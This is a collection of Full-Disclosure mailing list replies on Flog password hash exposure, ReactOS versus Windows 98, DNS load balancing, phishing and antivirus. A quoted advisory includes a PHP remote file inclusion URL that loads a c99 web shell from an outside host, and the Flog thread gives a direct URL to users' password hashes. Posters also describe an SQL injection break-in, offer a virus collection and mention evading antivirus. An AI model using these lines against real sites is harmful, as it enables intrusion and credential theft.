http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Flog 1.1.2 Remote Admin Password Disclosure
On 1/8/07, [EMAIL PROTECTED] [EMAIL PROTECTED] wrote: On Sun, 07 Jan 2007 16:08:23 +0100, endrazine said: yes that's correct but don't forget that hashes can collide it could be the case that: can ? could ? might ? Do you have any mathematical prouve or are you just guessing ? It's a pretty easy proof actually. If your password input routine allows more different passwords than there are possible hashes, you *will* have collisions. For instance, if you use a 64-bit hash, and reasonable-length passwords, you can create more than 2**64 of them, and 2 *have* to collide. right xhash($Up3$tr0n9 # [EMAIL PROTECTED]) == xhash(1234) and you don't even need the original strong one ;) what hashing algorithm is being use ? Is a collision realistic ? How much time would it take to actually break a given hash ? If you're using anything resembling a sane hash (such as MD5 or similar), what happens is that you basically ignore the hash collisions - because rather than 1234, your colliding password/phrase is probably a 32-byte or so string, which is likely not even enterable at the keyboard (it ends up being A # ctl-b 9 e alt-control-meta-$ etcetc - of the 32, likely only 10 or so of the characters are from the 96-char printable ASCII set, and there's a good chance that at least several of the bytes are ones you can't enter from the keyboard at all) Well I think you should not ignore those collisions, in some cases binary data could be entered as a password for example when sent over the network so... do not count on having to type it on a keyboard machines can do that for you ;). BTW for that still do not beleive this bug is a BIG hole well... as an example a friend of mine broke into a website about 2 days ago reversing an MD5 hash. Using a similar bug in one of those php instant website creation tools that disclosed the administrator password hash using some sort of SQL injection. He was using a program similar to John the Ripper and asked me for help since that was taking very long and he had no idea about rainbow tables. I simply told him to use one of those online Rainbow tables an the thing ended taking only a couple of minutes. And he was only learning about SQL injection and was only one hash that popped when you typed in your browser some sort of URL containing that SQL stuff. No imagine when you have the whole database. No... is not BIG, is HUGE. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Flog 1.1.2 Remote Admin Password Disclosure
On 1/5/07, [EMAIL PROTECTED] [EMAIL PROTECTED] wrote: On Fri, 05 Jan 2007 15:34:49 EST, T Biehn said: This isn't a password disclosure, it's a leak of password information. It's a password hash, you super hacker. And given the hash, and knowledge of how the hash is computed, it becomes possible to dictionary-attack (and other related techniques), and thus get the actual passwords, unless there are other things in place to ensure that all users have passwords sufficiently strong to resist those techniques. yes that's correct but don't forget that hashes can collide it could be the case that: xhash($Up3$tr0n9 # [EMAIL PROTECTED]) == xhash(1234) and you don't even need the original strong one ;) so strong password is not a countermesure to that I beleive that is a BIG security hole Regards Waldo And given that this: http://remote_server/data/users.0.dat works, the probability that the hashes represent strong passwords is quite close to nil. In any *practical* sense, the fact that the attacker can get the hash and from that extract/compute at least some passwords means that the passwords are *effectively* disclosed, even if the actual bitstring originally retrieved isn't the actual password. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Vuln ....
Thanks. But don´t worry I won´t read sh... anyway :) Nothing interesting could come from that hitman anyway.RegardsWACOn 10/16/06, Pink Hat [EMAIL PROTECTED] wrote: On 10/16/06, wac [EMAIL PROTECTED] wrote: Hey you could start by writing those sites in english :P http://translate.google.com/translate?u=http%3A%2F%2FWwW.Pal-HackinG.Com+langpair=ar%7Cenhl=enie=UTF8Not perfect but readable... I guess... ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Vuln ....
Hey you could start by writing those sites in english :POn 10/13/06, hitham hitham [EMAIL PROTECTED] wrote:===# Found By Sp1deR_NeT .. # E-mail :- [EMAIL PROTECTED]# Site's :- WwW.Sp1deR-N3T.Com +++ WwW.Pal-HackinG.Com # We Are :- PalEstineHackerS TeAm ..(Sp1deR_Net , MohajaLi , HACKERS PAL )*Script :- PHP rojekt5.1.1-Code Vuln :-$include_path = $path_pre.'lib/lib.inc.php'; include_once($include_path)In File :- editor_big.php-Exploit : lib/specialdays.php?$path_pre=www.soqor.net/tools/c99.txt?Example :- www.sitename.com/[path]/lib/specialdays.php?$path_pre=www.soqor.net/tools/c99.txt?- [EMAIL PROTECTED]Sp1deR_NeT ^__^===_ Be the first to hear what's new at MSN - sign up to our free newsletters!http://www.msn.co.uk/newsletters___Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.htmlHosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Server Redundancy
Hi:Thanks I'll check ipvs.RegardsWaldoOn 8/10/06, Tim Hecktor [EMAIL PROTECTED] wrote: Hello, Isn't there a way to map a name to several IPs?Or use aliases? Maybethis is what you are looking for: pandora:~# dig ftp.freenet.de ; DiG 9.2.1 ftp.freenet.de;; global options: printcmd;; Got answer:;; -HEADER- opcode: QUERY, status: NOERROR, id: 59136;; flags: qr rd ra; QUERY: 1, ANSWER: 5, AUTHORITY: 3, ADDITIONAL: 3 ;; QUESTION SECTION:;ftp.freenet.de. IN A ;; ANSWER SECTION:ftp.freenet.de . 1457 IN CNAME ftp-0.freenet.de. ftp-0.freenet.de. 600 IN A 194.97.2.69 ftp-0.freenet.de. 600 IN A 194.97.2.70 ftp-0.freenet.de. 600 IN A 194.97.2.67 ftp-0.freenet.de. 600 IN A 194.97.2.68 This will map a name to more than one ip and will give you load-balancing this way, but not real redundancy. To map a service to different hosts redundant you can use a box running ipvs. Thisbox can be made redundant with a identical box using mon and heartbeat to doip failover. Best regards, Tim Hecktor ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Server Redundancy
Hi:Isn't there a way to map a name to several IPs?Or use aliases?I'm interested in the subject because I want to do the same thing.RegardsWaldoOn 8/9/06, Gary E. Miller [EMAIL PROTECTED] wrote:-BEGIN PGP SIGNED MESSAGE- Hash: SHA1Yo Sec!On Wed, 9 Aug 2006, Sec Bas wrote: I was thinking about doing this with Dynamic DNS and using rsync to replicate changes.Dynamic DNS will not provide the response you are looking for.Many browsers cache DNS for 30 mins or more regardless of your TTL.ManyISPs cache DNS for a day or two regardless of your TTL.My expererienceis that it takes up to 2 days before a DNS change fully propogates even with a TTL of 5 mins.In some pathological cases I have seen it take 6months.RGDSGARY- ---Gary E. Miller Rellim 20340 Empire Blvd, Suite E-3, Bend, OR 97701 [EMAIL PROTECTED]Tel:+1(541)382-8588-BEGIN PGP SIGNATURE-Version: GnuPG v1.4.3 (GNU/Linux)iD8DBQFE2oNg8KZibdeR3qURArlxAJ49KBVwNqLDrDPkUzjvg0FmzIKt1gCg4AMb 72lChX0rNrr+zyVeH72SR58==b2wW-END PGP SIGNATURE-___Full-Disclosure - We believe in it.Charter: http://lists.grok.org.uk/full-disclosure-charter.htmlHosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Gmail emails issue
Hi:Worried about a temp file in gmail servers and not by the fact that using a browser your mails goes who knows where server in plain text? Except for the login part that uses SSL of course. Somebody could be sniffing :D regardsWACOn 8/4/06, 6ackpace [EMAIL PROTECTED] wrote: Hi All, Gmail stores mails in Temp folder for faster access.but i have observer it fails toremove mail from the temp files after the session is ended. any user who has access physical access to the system can read mail and contact information of the Gmail user. Discloses information which is private and confidential? thank you ratna ___Full-Disclosure - We believe in it.Charter: http://lists.grok.org.uk/full-disclosure-charter.htmlHosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] 70 million computers are using Windows 98 right now
On 8/1/06, Eliah Kagan [EMAIL PROTECTED] wrote: On 7/27/06, wac wrote: Now, Linux is definitely not a natural migration pathway. That theory of adapting server oriented operating systems to the desktop, and believe if was going to be a succes has proven to be wrong. Really? Windows 2000, Windows XP, and Mac OS X seem to work pretty well for novice users... Sorry I don't get the point here. Or are you belaboring the misguided claim that Linux is fundamentally a server-based system but that Windows NT is not? There was Windows NT workstation ;). With windows was the other way. From desktop to server. Of course you can change Linux so much that it won't be Linux anymore. Definitely putting an X server on top of unix won't make it ready for desktop, that's a fact.Are you honestly claiming that Windows NT Server has a nonintuitive user interface and yet Windows NT Workstation has an intuitive userinterface? (Or was that a joke?) They are the same operating systemexcept for additional executables and registry tweaks. Of course not, they are almost the same. Hey! take a look at winNT 4.0 resources in explorer some bitmaps say windows NT server, workstation and there was a 3rd one, I don't remember very well. I don't even consider windows OS server oriented at all (that is why I mentioned the workstation thing if interested). I can say then something similar. Adapting desktop oriented OS to server ... And yes numbers proof that. Anyway I guess is a problem of selling more or having it installed on more computers. But then that's not my problem. Mine and many others are having their problems solved. And yes I can tell you a couple of stories about that. I have some windows servers. And guess what. I'm praying for a linux/freebsd or whatever *nix you can name. But then the persons across the sea just can't install that. Then I guess that would give you an answer about the installer interfaces you talk later. No, they just can't intall a Linux at all, and beleive me, I tried hard to make that happen. Imagine a FreeBSD or something else. My only chances would have been for example to use some virtualization software and install other OS in some partition and then pray that a boot loader installer from windows would wake up correctly the other OS. As you can see that was a big IF we were not ready to take. Anyway I was left without choices and now the software those servers run had to be built on top of Windows. Well IOCompletionsPorts work OK as long as the non paged pool doesn't drains out when the number of opened sockets goes too high. Yes even with the registry hack to increase its size. Also the use of windows for example included having to install a comercial SSH software instead of OpennSSH (no the cywin port was not ok, it hanged the server sometimes because of it's emulation created a process for every user logged in). Ohh yes we are talking about real money here. Beleive me I really prayed for a damn good user friendly installer once. When you said,server-based I thought you meant designed for enterprise client-server situations. If you mean designed to be usedexclusively on a dedicated server box operated by a technicallylearned network administrator then (by definition) no general purpose operating system (be it Windows, Linux, FreeBSD, OpenBSD, NetBSD, orany other) is server-based. Saying that noobs can't use Linux doesn'tmake it so. FreeBSD is a particular general purpose operating systemthat is perhaps almost exclusively used by people who know well what they are doing (or are willing to put in the time and effort tolearn)--and Mac OS X is based on FreeBSD. (To be fair, some elementsare based on NeXTstep, which is another operating system used almostexclusvely by the technically inclined.) This notion that you can'ttake an operating system that has been traditionally hard to use and make it easier is senslessly defeatist and unsupported by evidence,though it may be partially self-fulfilling.Ok where is that evidence? MacOS X is not a good example when you have little choices you can make. What would you intall in a mac instead? Linux? Then I guess we have the same situation here. But also keep in mind that the only thing that Mc X got from freebsd was the kernel. Anyway I'm not an expert here so I guess that I can't talk very much about the subject. So far I see that Windows is more used on the desktop than any other OS and yet you have to pay for the license (or violate it) and all the rest of the sh.. we all know. And now some Macs have intel inside. Are we going to see the Apple selling Wintel too in the future? Maybe, when they realize that they are probably going to sell more computers. As an aside, if you're saying that Windows NT is even based on Windows9x, I would take argument with this. This is a claim I never did.Would you say that OS/2 is based on Windows 9x? Of course not. It was based somehow in MS-DOS. It was supposed to be the succesor of that one. But then M$ dropped
Re: [Full-disclosure] 70 million computers are using Windows 98 right now
On 7/26/06, Eliah Kagan [EMAIL PROTECTED] wrote: Waldo-- It will runeverything(almost) that runs on top of a win32 subsystem...(the top bar is higer actullay, it goes for native java, native linux, native DOS, OS2 etc.. is a long list) and drivers as well, enought for migration ;). Anyway you take it if you want, is free to try :D.It aims to run everything that runs on top of a win32 subsystem andmore, and it will probably succeed. I am very happy about the ReactOS project--but I think it's important to realize the difference betweenwhat an OS will be and what it is now. In the context of security,Windows 98's developers are no longer committed to security forWindows 98 (even to the degree to which they were before), and ReactOS's developers *cannot* be committed to security for ReactOSbecause ReactOS is not stable--i.e. the developers do not classify itas stable, i.e. the developers are perfectly willing to have bad,insecure code in the system for an extended period of time if doing so is most conducive to development. It is even smaller than 98 and will work with 32 Mb of RAM (maybe less in the future, some ppl are already testing at 8 MB hey that's better than even win 95 and is a full NT Box WOW I beleive M$ make some millions to spend a couple of dollars in memory chips!!).It was really, really small the day before the first line of code waswritten. It was pretty small after the first hundred lines of code were written. In it's still incomplete state, it is no surprise thatit is still smaller than a complete operating system to which iteventually is slated to contain comparable functionality in most orall areas. It is more complete than incomplete ;) If someone can ever say that a software is complete. But ceirtanly there is not much missing. I would say that it is about 70-80 %. Of course what's left are the most hard to do parts beacause being Windows so closed there are still many obscure points that needs to be clarified. I may be misremembering, but I'm pretty sure that my old 75MHz P1no-MMX Packard Bell box had 8MB of RAM when I put Windows 98 on it (due to the other 8MB not being properly seated in the RAM slots atthe factory...ah Packard Bell, brings back memories...). Windows 98crashed a lot, but it didn't crash any more often than I've heard itcrashes on just about any box, due to it being Windows 98. What is cool is that ReactOS can be run, more or less, with 8MB ofRAM, and ReactOS is an *NT* style system--I wouldn't attempt that withWindows NT 4.0. I've never used any version of NT before 4.0, and I don't know what their memory footprints were. Perhaps they were less.I beleive you can wake up NT 4.0 with a minimun of 16 Mb. I could give it a try with some virtualization software to figure out but is not one of my priorities right now. Anyway it will run on a machine where windows 98 runs. It's hardware requirements are equal or lower. Today linux distros take 128 Mb or more to run decently. So IMHO it is a replacement candidate for some situations already.You have a good point--it may be a reasonable replacement candidatefor Windows 95/98/ME systems **where a guarantee of security being apriority, from the vendor, is not required**. This implies that the user knows enough about security to manage the risk that the vendor isnot managing. A guarantee of security from the vendor may nottranslate into actual security, but it does translate into securityprofessionals getting pissed off and vocal when actual security is not delivered.I doubt ReactOS is a good replacement candidate for a Linux system--ifmemory is the primary concern, OpenBSD or a small Debian system withthe kernel rebuilt sans unnecessary code would be a better option. If a working Linux or other POSIX-like API is implemented as a subsystemthen it might be a reasonable replacement for Linux and/or other *nixsystems.No, of course not. Not even a fully working windows is a replacement at all for linux in most situations. Anyway if we put the linux+wine+ndiswrapper the memory footprint of that configuration is probably high. You could be righ here, I have not seen the memory requirements of those configurations. Now, Linux is definitely not a natural migration pathway. That theory of adapting server oriented operating systems to the desktop, and believe if was going to be a succes has proven to be wrong.Really? Windows 2000, Windows XP, and Mac OS X seem to work prettywell for novice users... Sorry I don't get the point here.Or are you belaboring the misguided claim that Linux is fundamentally a server-based system but that Windows NT is not?There was Windows NT workstation ;). With windows was the other way. From desktop to server. Of course you can change Linux so much that it won't be Linux anymore. Definitely putting an X server on top of unix won't make it ready for desktop, that's a fact. I wonder if mi parents will manage someday to even install it :D. (yes I'm making a constructive critic here)Have them install
Re: [Full-disclosure] 70 million computers are using Windows 98 right now
On 7/11/06, [EMAIL PROTECTED] [EMAIL PROTECTED] wrote:On Tue, 11 Jul 2006 13:28:08 -0300, Cardoso said: but I agree. Let them die. 98 is a very unsafe plataform, hope the spyware guys act fast and kill all the remaining machines, under a ton of popups.And where does that leave the users?Have you considered that maybe someof them are still using Win98 because they don't have a realistic upgrade path?WinXP may not install on their box, or run adequately - and justtelling them to upgrade isn't always an option.There's large parts of theworld where a discarded box running Win98 is affordable, but a new box and a legal copy of XP is just out of the question.Phrased differently - how would *you* feel if *your* platform was the targetof the sort of attack you're advocating against Win98? I would use ReactOS in that case ;) --- www.reactos.com The alpha 0.3.0 rc1 is already there waiting for the download yep an alpha but then that is what win98 always was, a badly designed alpha putted on the market with rush to produce money at the expense of a lot of data destruction. Fortunately later m$ paid that with some degreee of credibility loss. Anyway if an alpha is not enought for you the MAKE IT BETA ;) you have the sourcecode ready to play with. RegardsWaldo___Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.htmlHosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Vunerability in yahoo webmail.
Hi folks:Can I get this file somewhere else? Like a web site or something. This gmail thing detects it as a virus. I doub't yahoo will let it pass still, that's wht i don;t ask anyne to send it to me ;). I wonder who asked to have an stupid scanner in the e-mail that you can't disable. I don't even have one on my computer!!! Anyway I understand I'm not common kind of people ;). Thanx in advance. WaldoOn 6/12/06, David Loyall [EMAIL PROTECTED] wrote: Hello, all.I just received an email with an html attachment, on a yahoo account.When I opened the mail, yahoo automatically displayed the html, and executed the code within.What the hell. =)It forwarded the message to my contacts list, (or some other set of addresses, dunno,) and redirected my browser to a website. I'm of to a BBQ, and I don't care about yahoo.So I'm not even going to read the code and see how this happens.I'm attaching the html file as a text file.Enjoy! Oh, I've CC'd [EMAIL PROTECTED], but if someone else would give them a proper write-up, and encourage them to close the hole, that'd be wonderful. Cheers, --David LoyallOmaha, NebraskaDavid Loyall ___Full-Disclosure - We believe in it.Charter: http://lists.grok.org.uk/full-disclosure-charter.htmlHosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] FrSIRT Puts Exploits up for Sale
Jejej no Way, That would be the only thing that will make me to remove the bookmark from my browser. Anyway there are a couple of some other sites that give those files for free so we won't loose anything :D We'll simply change the provider. RegardsWaldoOn 3/16/06, Ivan . [EMAIL PROTECTED] wrote: http://www.eweek.com/article2/0,1895,1938511,00.asp___Full-Disclosure - We believe in it.Charter: http://lists.grok.org.uk/full-disclosure-charter.htmlHosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Phun! Search
LOL jajajajajajOn 3/21/06, Javor Ninov [EMAIL PROTECTED] wrote:
i hope you soon reach 18 and start thinking about sex... you will likeit i am suren3td3v wrote: \/\/3 53nd j00 m4d c0d35 ch3x j00r 1nb0x3r ph0r Xpl01t c0d3 2 m4n1pul4t3 phUN! s34rch h0h0h0
On 3/21/06, *teh kids* [EMAIL PROTECTED] mailto:[EMAIL PROTECTED] wrote:
G00d W0Rk, i7 533m5 tHaT u ArE pu77ing Y0Ur 3x7r@ ChR0M050M3 70 g00D u53 XxX On 3/21/06, n3td3v [EMAIL PROTECTED]
mailto:[EMAIL PROTECTED] wrote:Vendor: Yahoo! Inc. Service: Yahoo! Search.
Description: Phun! Search indexes millions of documents, including its own user accounts. Concept:
http://66.218.69.11/search/cache?ei=UTF-8p=n3td3vfr=sfpu=mtf.news.yahoo.com/mailto%3Furl%3Dhttp%253A//e.my.yahoo.com/config/cstore%253F.opt%3Dcontent%2526.node%3D1%2526.sid%3D171771%26title%3DChoose+Content%26prop%3Dmycstore%26locale%3Dus%26h1%3Dymessenger+at+Yahoo%21+Groups%26h2%3Dn3td3v%26h3%3Dhttp%253A//my.yahoo.comw=n3td3vd=U5wy1m1aMbOeicp=1.intl=us
http://66.218.69.11/search/cache?ei=UTF-8p=n3td3vfr=sfpu=mtf.news.yahoo.com/mailto%3Furl%3Dhttp%253A//e.my.yahoo.com/config/cstore%253F.opt%3Dcontent%2526.node%3D1%2526.sid%3D171771%26title%3DChoose+Content%26prop%3Dmycstore%26locale%3Dus%26h1%3Dymessenger+at+Yahoo%21+Groups%26h2%3Dn3td3v%26h3%3Dhttp%253A//my.yahoo.comw=n3td3vd=U5wy1m1aMbOeicp=1.intl=us
Remark: Yahoo! is not affiliated with the authors of this page or responsible for its content. :-) Thank: n3td3v.
Greet: Yahoo! core security team. ___ Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ http://secunia.com/
___ Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
___Full-Disclosure - We believe in it.Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Is this a Virus?
On 12/29/05, Shawn Cox [EMAIL PROTECTED] wrote: I doubt it's a virus.Filling up a hard-disk is counter productive to propagation.Though I do think it was an option in the VCL of old. Hi: Well if the virus releases the space before infection, can be productive to the propagation since it would reserve that space you won't be able to fill with other data ;). Generally is easy to detect a virus. Feed your computer with a couple of fresh executables, and some will go out modified with high probability and most times with the size increased. Warning there are slow viruses that takes it's time to reproduce, and usually last years before somebody even notices. However this is not very usual, generally viruses eat whaetever you give them except some with bait detection. Most check baits for the size, and some do more advanced thingies like analize the file for knows routines in High level laguages or variations in the instructions. If interested I have a lot of literature around and a huge 5000+ virus collection build over the years. Some are still on schedule for reversing but if anyone is interested just gime a call it would be great to save myself some time. Regards Waldo Alvarez ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Good proxy chaining applications
Hi: You can use openssh in one of the machines, plink (command line client that comes with putty). and freecaps ( http://www.freecaps.ru ) if you want a complete free system. But you can instead of freecaps use proxifier (www.proxifier.com) that works better, althoug proxifier sometimes have to be finished forcibly with the task manager because sometimes it becomes somehow idle in the bacground avoiding all the outgoing connections. Regards Waldo AlvarezOn 12/30/05, pagvac [EMAIL PROTECTED] wrote: Happy holidays to everyone who is subscribed to the list!I'm interested in getting opinions from people that have experienceusing proxy chaining applications.Please, don't tell me to use Google. I've done so already! I *don't* want a compiled list of proxy chaining applications but rather advisefrom people that *have* actually used them.I've been playing with SocksChain [www.ufasoft.com/socks/ ] whichsupposedly allows you to choose the executable of your favoritebrowser (or any other app) and it will then sock it. In reality, myIP address was still showing [ http://www.whatismyip.com/] aftersocking Firefox (probably I'm not doing something right).I welcome any comments on applications that provide privacy whensurfing the web. I'm interested in applications that update a list of proxies automatically and will connect you to each of them. I'mtalking about some sort of client like SocksChain that you can installon your desktop and will then do the job, rather than cgi proxies[ http://www.freeproxy.ru/en/free_proxy/cgi-proxy.htm] or public lists[http://www.publicproxyservers.com/page1.html]Regards,pagvac --pagvac (Adrian Pastor)www.ikwt.com - In Knowledge We Trust___Full-Disclosure - We believe in it.Charter: http://lists.grok.org.uk/full-disclosure-charter.htmlHosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] a call for full-disclosure to become a moderatedlist
Hi: I beleive that such moderated version should be given as an alternative when people subscribe to this list. I mean in the webpage or in the help mail. I also don't want this one to be moderated and I feel just fine with the messages sent but if anyone wants it filtered... Well why not, they have their rights and who knows If some day I feel that I need it maybe I switch. Who knows? Regards WaldoOn 12/16/05, James Longstreet [EMAIL PROTECTED] wrote: On Dec 16, 2005, at 5:55 PM, Michael Evanchik wrote: I second thisThere's no point discussing it, or holding it to a vote.The purposeof this list is to be unmoderated.The list owner has stated over and over that that is the one point he will not concede on.Kurt Seifried, among others, runs a moderated version of this list.I can't vouch for its quality, since I'm not really interested in thelist being moderated.If you want moderation, look elsewhere.If you don't want someone else moderating the list, learn about filters,or even your 'D' key.Calling for full-disclosure to be moderated is pointless and iswearing out my 'D' key.___ Full-Disclosure - We believe in it.Charter: http://lists.grok.org.uk/full-disclosure-charter.htmlHosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] McAfee VirusScan vs Metasploit Framework v2.x
Hey guys I guess you are wasting so much time. Is very easy to just encrypt some modules and enjoy mcafee or any other to stupidly tell you that the computer is clean. Period, do not waste your time with McAfee or any other, it just takes 1 second. Poor world beleiving in antivirus. Regards WaldoOn 12/9/05, Morning Wood [EMAIL PROTECTED] wrote: // look, no top post !!! Looks like some overzealous idiot at McAfee added Trojan signatures for 202 files in the latest version of the Metasploit Framework. If you use the Framework for your job and have a McAfee support contract, *please* call them and let them know that their product is incorrectly tagging a standard security tool as a Trojan and that this is interfering with your ability to conduct business.the external payloads ( such as vncdll.dll ), could be considered apossible malware threatbut not the whole package. ( although i guess if kiddies can root yourserver, upload msf, launch msfweb, that would give you a remote attack platform... right ). Further, to include these sigs on a desktop product isjust ignorant.mw___Full-Disclosure - We believe in it.Charter: http://lists.grok.org.uk/full-disclosure-charter.htmlHosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Window's O/S
Hi: I guess that is the remaining of an old IE bug that opened notepad.exe on the desktop. I remember it quite well, it is archived somewhere for sure.On 11/24/05, jacob jango [EMAIL PROTECTED] wrote: Not sure if you guys are aware of this issue windows XP...!! create an folder on deskop and name it as notepad. open internet explorer go to view source code this will open the contents of notepad folder!! Yahoo! Music Unlimited - Access over 1 million songs. Try it free. ___Full-Disclosure - We believe in it.Charter: http://lists.grok.org.uk/full-disclosure-charter.htmlHosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Is this a phishing attempt?
Hi: I have3 a couples of stories to talk about this. Jejej I have even interchanged mail with those guys doing that. Do the following. If they are a prince or a king or a pressident or whomever wants to give you millions. Jejej tell them to pay you the airplane ticket that you have no money at all. Jajaja is only a couple of thousands that compared to a million is nothing. If they do jeje you take a free vacations. Beleive meyou will receive an excuse. The intention behind those mails is to steal your money getting your data and make someone similar to you to for instance make bank transactions etc. Beware in such case you could later become a problem that needs to be erradicated so by all means never give your personal data.When you find someone owning a fortune beleivme it worth it to do that. They ask personal information as well as pictures of you. You could even follow themwith the gameand give them fake picturesor fake data. I remember that once one of them said he was from my country. Jejej instead of a message in english I made the guy to translate the mail if he wanted to answer me. And he/she did and also investigated. He complainted about the language that heleft tha country a long time ago.Jajajaj it was very funny to look at him/her doing mistakes. Finally he/she gave up with me. Another one also told me to scan my passport and later to send it using a fax or e-mail. Jejej I told him that I didn't have one and that I didn't have the money to get it that if he could send me that it was all right. I received an excuse and never knew about that guy again. Regards Waldo Alvarez On 8/24/05, winsoc [EMAIL PROTECTED] wrote: Hi,has anyone else received this?I seriously cannot believe that someone would be so mundane in thinking that people would reply to this.QUOTE :-Original Message-From: prince josey [mailto:[EMAIL PROTECTED]]Sent: Wednesday, August 24, 2005 4:11 AM Subject: - TREAT AS URGENT -ATTN: Dear Friend,How are you doing with your family?I presume that all is well withyou.I am Prince Jocelyn, the manager of audit and accounting department (LaBanque De L'Afrique) Ouagadougou, Burkina Faso.I got your contact from theinternational business directory when i was searching a foreigner who willassist me in a profitable business deal that will yeild us life success.Before I wrote you,I prayed that you will be a honest and reliable person whom i can work with to achieve this deal of our life.From my section in thebank, I discovered an abandoned sum of FOURTEEN MILLION UNITED STATESDOLLARS ($USD14M) thatbelongs to one of our customer who died along with his entire famillies,on 25TH JULY,2000 CONCORDE PLANE CRASH[Flight AF4590 ] with thewhole passengers on board.The name od the deceased man was (MR. ANDREASSCHRANNER from Munich,Germany.You have to understand that I come across this huge amount of fund when i was balancing an Internal Audit account of thedepartmental customers file tosubmit to the bank management for the annual audit of the year.Since the bank got information about the death of the deceased man, the bank have been expecting his next of kin to apply and claim this fund because thebank cannot release the fund to any a person unless a foreigner apply forthe transfer of the fund as the next of kin or relation to the deceased relating to this inheritance, but unfortunately i learnt throughinvestigations that no one has come up for the claim.This is the reason why I am making this business proposal to you so that youwill apply to the bank for them to wire this fund to your nominated account as the next of kin or relation to the deceased customer.For us to achieve this businesss immediately,the percentage ratio forsharing the fund when the bank release the fund for you must bearranged accordingly upon your confirmation of your intent. Thereafter I will visit your country for sharing modalities ofpercentages indicated above.So for the immediate transfer of this fund intoyour bank account as arranged, you must apply first to the bank as the only existening next of kin to the deceased customer by indicating in theapplication the bank account information where you will request the bank towire the fund.So if you accept to help me in order to achieve this great business,i will send to you through email or by fax an application form ofclaim which you will fill with your account information and send to the bankfor the transaction to start immediately.Please i would like you to know the following information.(1.) This business is completely free fromrisk while your personality and reputation will be protected.(2.)You will not face any circumstances beyond our control because theapplication will bear the brief information of the deceased which the bank may like to know.(3.) If you will follow my directives,this transactionwill be completed within a short time.(4.)You should keep this businessCONFIDENTIAL or SECRET until the completion of this deal.Please contact me through my email address
Re: [Full-disclosure] Off topic. To the list Admins or anyone that can help me
Hi ppl: Thanks to all those that tried to help me. I just can't read that much mail. But thanks to almost all responses (except the ironic one please save us both some time next time) Since most answers are like this one I'll use this as reply (sorry folks I guess this is the most optimized way for me to answer all of your mails ;) ) But I guess this is needs to be pointed out in order to make the list better for every one. On 8/20/05, Cory Stoker [EMAIL PROTECTED] wrote: Hello Waldo: I do not have a GMail account so I do not know if this possible but I filter this list by using the List-Id header in email. All messages try sent to the full-disclosure mailing list will have the List-Id header set to: An unmoderated mailing list for the discussion of security issues full-disclosure.lists.grok.org.uk. Of this I make sure that full-disclosure.lists.grok.org.uk is in the header. This makes it easier than filtering on to:, from:, or subject. To view headers for a mail, I would see if there is an option to view all headers in your respective email client. Of course if it is webmail this could not be an option. Hope this helps... The gmail filters are: From To Subject Has the words Doesn't Have Yep stuff for the masses is simple. I bet I'm not the only one with this simplicity problems ;( I suggest that it would be good to make configurable on the 